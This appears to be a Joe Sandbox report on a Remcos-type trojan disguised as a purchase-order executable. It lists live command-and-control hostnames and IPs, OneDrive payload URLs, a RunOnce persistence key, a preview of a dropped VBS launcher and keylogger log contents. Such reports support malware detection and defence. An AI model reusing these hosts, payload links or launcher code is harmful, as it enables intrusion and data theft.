Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	System Information Discovery32	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
micheal3m.hopto.org	1%	Virustotal		Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sheilabeltagy4m.hopto.org	79.134.225.124	true	false		unknown
micheal3m.hopto.org	79.134.225.124	true	false	1%, Virustotal, Browse	unknown
onedrive.live.com	unknown	unknown	false		high
vug8la.am.files.1drv.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?cid=1685231EC8E4EC43&resid=1685231EC8E4EC43%2	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://onedrive.live.com/b	SBG-1100319PurchaseOrder.exe, 00000002.00000002.502105694.0000000000929000.00000004.00000020.sdmp	false	high
https://vug8la.am.files.1drv.com/y4mT1QYIp_fyTE8Fy0lLLYF_0s99rPZfbzgWA1b5QlZt4eQwn4RVNktZv9qdlLB64Ai	SBG-1100319PurchaseOrder.exe, 00000002.00000002.502229070.0000000000971000.00000004.00000020.sdmp, SBG-1100319PurchaseOrder.exe, 00000002.00000002.502196213.000000000095A000.00000004.00000020.sdmp	false	high
https://onedrive.live.com/download?cid=1685231EC8E4EC43&resid=1685231EC8E4EC43%21505&authkey=ANKqoxx	SBG-1100319PurchaseOrder.exe, filename1.exe, 0000000D.00000002.341786606.0000000000560000.00000040.00000001.sdmp	false	high
https://vug8la.am.files.1drv.com/	SBG-1100319PurchaseOrder.exe, 00000002.00000003.345228305.0000000000971000.00000004.00000001.sdmp, SBG-1100319PurchaseOrder.exe, 00000002.00000002.502175655.000000000094A000.00000004.00000020.sdmp	false	high
https://onedrive.live.com/	SBG-1100319PurchaseOrder.exe, 00000002.00000002.502105694.0000000000929000.00000004.00000020.sdmp	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.134.225.124	sheilabeltagy4m.hopto.org	Switzerland		6775	FINK-TELECOM-SERVICESCH	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	388089
Start date:	15.04.2021
Start time:	21:36:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SBG-1100319PurchaseOrder.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@8/3@62/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 4.8% (good quality ratio 4.8%) Quality average: 56% Quality standard deviation: 6.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 52.255.188.83, 104.43.193.48, 92.122.145.220, 104.43.139.144, 23.57.80.111, 13.107.42.13, 13.107.42.12, 2.20.142.209, 2.20.142.210, 51.103.5.159, 20.82.210.154, 23.32.238.177, 23.32.238.234, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, au.download.windowsupdate.com.edgesuite.net, odc-dm-files-geo.onedrive.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, wns.notify.trafficmanager.net, l-0003.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, odc-dm-files-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:37:39	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs
21:37:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
79.134.225.124	RFQ234.exe	Get hash	malicious	Browse
	SURE.exe	Get hash	malicious	Browse
	remps1.ps1	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FINK-TELECOM-SERVICESCH	kYXjS6Oc3S.exe	Get hash	malicious	Browse	79.134.225.40
	eK1KiJlz3l.exe	Get hash	malicious	Browse	79.134.225.40
	80tzo8FG3d.exe	Get hash	malicious	Browse	79.134.225.40
	SecuriteInfo.com.Trojan.PackedNET.658.8528.exe	Get hash	malicious	Browse	79.134.225.62
	perchase order.pdf.exe	Get hash	malicious	Browse	79.134.225.102
	New Order.exe	Get hash	malicious	Browse	79.134.225.125
	New Tender04,pdf.exe	Get hash	malicious	Browse	79.134.225.70
	list3503-purchase-order-12-04-21.pdf.jar	Get hash	malicious	Browse	79.134.225.104
	list3503-purchase-order-12-04-21.pdf.jar	Get hash	malicious	Browse	79.134.225.104
	SecuriteInfo.com.Trojan.PackedNET.645.23105.exe	Get hash	malicious	Browse	79.134.225.30
	PR0078966.xlsx	Get hash	malicious	Browse	79.134.225.30
	PO NUMBER 3120386 3120393 SIGNED.exe	Get hash	malicious	Browse	79.134.225.21
	JQEl8bosea.exe	Get hash	malicious	Browse	79.134.225.30
	YfceI5MZX4.exe	Get hash	malicious	Browse	79.134.225.30
	SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx	Get hash	malicious	Browse	79.134.225.30
	OjAJYVQ7iK.exe	Get hash	malicious	Browse	79.134.225.112
	TSskTqG9V9.exe	Get hash	malicious	Browse	79.134.225.30
	Files Specification.xlsx	Get hash	malicious	Browse	79.134.225.30
	J62DQ7fO0b.exe	Get hash	malicious	Browse	79.134.225.30
	oE6O5K1emC.exe	Get hash	malicious	Browse	79.134.225.30

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Download File
Process:	C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	204800
Entropy (8bit):	5.671059123248846
Encrypted:	false
SSDEEP:	3072:hPLl4Y52bzb2z50FdSfZaa0e5+YghusL5PEqJ:hPLl4Y5s6ziKfx0eERV
MD5:	2DD62D78B9F7E9C5529502E085B55756
SHA1:	151D4CD68958DF35AE706CC232627A05E923307F
SHA-256:	C63A3F86BE406A11E8F7760403E407A97441753205F8CEF432FD634856CA2992
SHA-512:	9B7D8EE135DCA77460B5E2D566C2B42F68D5B97918F6D9C2F4BDF6F89D6C46B8001482123880D46137A59EF04BEC89498F728D018D4CC8FC57F56FBDFB705349
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....#J.....................0....................@..........................0..............................................t...(.... ......................................................................(... .......d............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs Download File
Process:	C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	120
Entropy (8bit):	4.938880835346308
Encrypted:	false
SSDEEP:	3:jfF+m8nhvF3mRD0nacwRE2J5xAIjuHdIRQM:jFqhv9IcNwi23faGqM
MD5:	8E21029138080630E1FCF8A6B4DA0159
SHA1:	B0B4C5CB0A53268829CB4FF33FBD906568FCD54B
SHA-256:	E692E45BD1482FA4C1932955B196BE0AA212EB792AFB65CDB85EA457EE5258B5
SHA-512:	1DCA2EE27776CEA53BADB8431D32613E65C62AD9E2C9A36552BD6F7D56AE6039E745C39136360A8509290650B3AFAE7D17C278F033750FEC186C853E41774C7A
Malicious:	true
Reputation:	low
Preview:	Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe")

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\SBG-1100319PurchaseOrder.exe
File Type:	data
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.608276114189592
Encrypted:	false
SSDEEP:	6:IlKkRmfxl55YcIeeDAlgRfebW/33flO1CfSMlW8g1UEZ+lX1FKDDcNebW/G:bZDecXbWnlOQqkXg1Q1FAccbWe
MD5:	0549758588F8B85AAC20868F10523E34
SHA1:	AE76F042B448277EF3CBACC63D7F00A8F6F1948F
SHA-256:	AC69EE30064EB845886176352A94214F1E278B7890BE119FDEE7F05AA234F467
SHA-512:	BC0E797B52EDB9692007933A1FA9761D6E44DF40D38F40B7420F9176F4020C32E2906141E2E2879029EA722D9C35ECCF22961A365A43C68FCA805799F942F327
Malicious:	true
Reputation:	low
Preview:	....[.2.0.2.1./.0.4./.1.5. .2.1.:.3.7.:.5.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .R.u.n. .].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].........[. .B.R.I.N.T.O.V.E.R.I.L.T.E.T.S. .].........[. .C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.u.b.f.o.l.d.e.r.1.\.f.i.l.e.n.a.m.e.1...v.b.s. .].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.671059123248846
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SBG-1100319PurchaseOrder.exe
File size:	204800
MD5:	2dd62d78b9f7e9c5529502e085b55756
SHA1:	151d4cd68958df35ae706cc232627a05e923307f
SHA256:	c63a3f86be406a11e8f7760403e407a97441753205f8cef432fd634856ca2992
SHA512:	9b7d8ee135dca77460b5e2d566c2b42f68d5b97918f6d9c2f4bdf6f89d6c46b8001482123880d46137a59ef04bec89498f728d018d4cc8fc57f56fbdfb705349
SSDEEP:	3072:hPLl4Y52bzb2z50FdSfZaa0e5+YghusL5PEqJ:hPLl4Y5s6ziKfx0eERV
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....#J.....................0....................@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401780
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4A23B8BA [Mon Jun 1 11:17:14 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e917dfcbe7bbc83f756c722d2ba3704e

Entrypoint Preview

Instruction
push 00402FE0h
call 00007F18808E3625h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ah, al
jmp 00007F189111903Ch
jbe 00007F18808E3676h
mov bh, 51h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f374	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x32000	0x98c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x164	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2e8fc	0x2f000	False	0.304521276596	data	5.8539621073	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x30000	0x11d4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x32000	0x98c	0x1000	False	0.17919921875	data	2.09138345915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3285c	0x130	data
RT_ICON	0x32574	0x2e8	data
RT_ICON	0x3244c	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x3241c	0x30	data
RT_VERSION	0x32150	0x2cc	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLineInputStr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaAryConstruct2, __vbaI2I4, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaVarMul, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaVarInt, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaVarLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Highness
InternalName	hippoglossus
FileVersion	4.00
CompanyName	Highness
LegalTrademarks	Highness
Comments	Highness
ProductName	INFILTRERER
ProductVersion	4.00
OriginalFilename	hippoglossus.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 15, 2021 21:37:50.658086061 CEST	49722	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:50.745105982 CEST	2048	49722	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:51.344219923 CEST	49722	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:51.431309938 CEST	2048	49722	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:51.937181950 CEST	49722	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:52.023936033 CEST	2048	49722	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:52.091919899 CEST	49725	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:52.176884890 CEST	2048	49725	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:52.687280893 CEST	49725	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:52.771493912 CEST	2048	49725	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:53.296722889 CEST	49725	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:53.381534100 CEST	2048	49725	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:54.446427107 CEST	49726	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:54.530323982 CEST	2048	49726	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:55.187752008 CEST	49726	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:55.271759033 CEST	2048	49726	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:55.796799898 CEST	49726	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:55.880161047 CEST	2048	49726	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:55.946604967 CEST	49727	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:56.032840014 CEST	2048	49727	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:56.640830040 CEST	49727	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:56.725261927 CEST	2048	49727	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:57.304725885 CEST	49727	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:57.387958050 CEST	2048	49727	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:58.510648966 CEST	49729	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:58.594577074 CEST	2048	49729	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:59.188102007 CEST	49729	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:59.271946907 CEST	2048	49729	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:59.797215939 CEST	49729	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:37:59.881184101 CEST	2048	49729	79.134.225.124	192.168.2.7
Apr 15, 2021 21:37:59.946696043 CEST	49730	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:00.032313108 CEST	2048	49730	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:00.687903881 CEST	49730	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:00.772231102 CEST	2048	49730	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:01.297344923 CEST	49730	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:01.381195068 CEST	2048	49730	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:02.643265009 CEST	49731	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:02.730581999 CEST	2048	49731	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:03.344342947 CEST	49731	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:03.431385040 CEST	2048	49731	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:04.032040119 CEST	49731	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:04.119266987 CEST	2048	49731	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:05.151153088 CEST	49732	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:05.234556913 CEST	2048	49732	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:05.797668934 CEST	49732	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:05.881674051 CEST	2048	49732	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:06.500875950 CEST	49732	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:06.586385965 CEST	2048	49732	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:07.661844969 CEST	49733	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:07.745783091 CEST	2048	49733	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:08.344841957 CEST	49733	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:08.428081989 CEST	2048	49733	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:09.032380104 CEST	49733	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:09.116520882 CEST	2048	49733	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:09.183631897 CEST	49734	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:09.269610882 CEST	2048	49734	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:09.776696920 CEST	49734	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:09.859898090 CEST	2048	49734	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:10.438726902 CEST	49734	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:10.522753000 CEST	2048	49734	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:11.600717068 CEST	49735	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:11.683999062 CEST	2048	49735	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:12.188847065 CEST	49735	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:12.274252892 CEST	2048	49735	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:12.798233032 CEST	49735	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:12.884767056 CEST	2048	49735	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:12.954102039 CEST	49736	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:13.038309097 CEST	2048	49736	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:13.642090082 CEST	49736	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:13.725850105 CEST	2048	49736	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:14.309469938 CEST	49736	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:14.395292044 CEST	2048	49736	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:15.495146036 CEST	49737	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:15.581310987 CEST	2048	49737	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:16.189173937 CEST	49737	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:16.272660971 CEST	2048	49737	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:16.798619032 CEST	49737	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:16.881822109 CEST	2048	49737	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:16.946445942 CEST	49739	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:17.029719114 CEST	2048	49739	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:17.533021927 CEST	49739	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:17.616312027 CEST	2048	49739	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:18.142458916 CEST	49739	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:18.226792097 CEST	2048	49739	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:19.298131943 CEST	49747	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:19.382178068 CEST	2048	49747	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:20.001991034 CEST	49747	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:20.086201906 CEST	2048	49747	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:20.697515011 CEST	49747	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:20.781402111 CEST	2048	49747	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:21.023291111 CEST	49748	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:21.107357025 CEST	2048	49748	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:21.642724991 CEST	49748	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:21.726025105 CEST	2048	49748	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:22.345961094 CEST	49748	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:22.431240082 CEST	2048	49748	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:23.527326107 CEST	49749	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:23.613301992 CEST	2048	49749	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:24.189809084 CEST	49749	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:24.276510954 CEST	2048	49749	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:24.799251080 CEST	49749	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:24.885890961 CEST	2048	49749	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:24.951113939 CEST	49750	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:25.035276890 CEST	2048	49750	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:25.690058947 CEST	49750	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:25.774110079 CEST	2048	49750	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:26.301428080 CEST	49750	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:26.386775970 CEST	2048	49750	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:27.468619108 CEST	49751	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:27.556128025 CEST	2048	49751	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:28.143313885 CEST	49751	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:28.231118917 CEST	2048	49751	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:28.760920048 CEST	49751	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:28.847779036 CEST	2048	49751	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:28.917922974 CEST	49753	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:29.002456903 CEST	2048	49753	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:29.534015894 CEST	49753	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:29.617923021 CEST	2048	49753	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:30.143552065 CEST	49753	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:30.230935097 CEST	2048	49753	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:31.307944059 CEST	49754	2048	192.168.2.7	79.134.225.124
Apr 15, 2021 21:38:31.395288944 CEST	2048	49754	79.134.225.124	192.168.2.7
Apr 15, 2021 21:38:31.998872995 CEST	49754	2048	192.168.2.7	79.134.225.124
